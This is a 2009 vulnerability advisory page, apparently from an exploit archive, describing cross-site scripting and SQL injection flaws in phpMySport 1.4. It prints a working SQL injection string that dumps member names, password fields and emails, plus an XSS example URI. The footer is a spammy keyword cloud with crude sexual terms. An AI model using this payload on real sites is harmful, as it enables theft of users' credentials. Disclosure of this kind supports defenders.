about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , PhpMySport Multiple Cross Site Scripting and SQL Injection Vulnerabilities


Title PhpMySport Multiple Cross Site Scripting and SQL Injection Vulnerabilities
Published 2009-03-12-12:00AM
Updated 2009-03-12-07:26PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  XaDoS
Vulnerable  phpMySport phpMySport 1.4
Not Vulnerable  
Code  An attacker can exploit these issues via a browser. To exploit a cross-site scripting issue, the attacker must entice an unsuspecting victim to follow a malicious URI.The following examples are available:
http://www.example.com/index.php?r=competition&v1=view&v2=1&v3=1&v4=&v5=all&v6=[XSS]http://www.example.com/phpmysport/index.php?r=membro&v1=member_listWrite in the search_member form the right query:999'/**/union/**/all/**/select/**/1,2,3,4,5,6,7,concat(member_firstname,0x3a,member_pass,0x3a,member_email),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/**/from/**/pms_member#
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Sun, 06 Dec 2009 17:05:37 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
apache 2.0 IPB 2.3.3 p...s/save www.52kan1 sleazydrea CMS is Fre FREE Dowun php-nuke 2 i...roc/se aishwarya ideo Cr\r\n0000 Www.womens indian sex Tamil acto SEXPICTUR www.dasuan sexarabic www.doshow PHP Live i...roc/se com_remosi adxmlrpc.p Www.womens CMS is Fre www.wnceo. Sexey free lo fi sexy fim www.coolyu adult wall com_remosi Wwwsexvide sxsirani KARLA SEX TAMIL SEX CMS is F.. iitojymysy 76tao.jimd php-nuke 2 components www.dcms.c WWW.TAMIL xxxx sex nero 8.2.8 xxlsex.com smeha dog fuck g all music teengrils